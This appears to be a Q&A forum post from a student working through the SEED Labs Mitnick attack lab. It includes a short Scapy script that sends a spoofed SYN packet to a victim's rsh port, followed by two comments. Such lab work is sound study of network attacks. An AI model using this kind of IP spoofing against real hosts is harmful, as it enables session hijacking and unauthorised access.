# Three way handshake TCP

Tags: linux, shell, ubuntu-16.04

I am working on seed lab mitnick attack.
Step 1: First step is to launch SYN flood attack to turn down server. I have `ping` the server from victim machine and stored the `IP` in cache of victim. After that I have disconnected the internet connection of server machine (server wouldn't response to victim and attacker with spoofed IP will communicate with victim). Now using scapy sniff and spoof I am sending spoofed SYN packet from my attacker machine and in return I am only recieving ACK packet from victim.

```py
#!usr/bin/python3
from scapy.all import *
import sys

print("Sending Spoofed SYN Packet ...")
IPLayer = IP(src="10.0.2.10", dst="10.0.2.8")
TCPLayer = TCP(sport=1023, dport=514, flags="S", 
seq=778933536)
pkt = IPLayer/TCPLayer
```

```
send(pkt,verbose=0)
```

Comment: #!usr/bin/python3
from scapy.all import *
import sys

print("Sending Spoofed SYN Packet ...")
IPLayer = IP(src="10.0.2.10", dst="10.0.2.8")
TCPLayer = TCP(sport=1023,dport=514,flags="S", seq=778933536)
pkt = IPLayer/TCPLayer
send(pkt,verbose=0)

Comment: It isn't clear what your desired result is. And I am not sure this is a programming question. And why the heck would you use Ubuntu 16.04 which is 5 years old?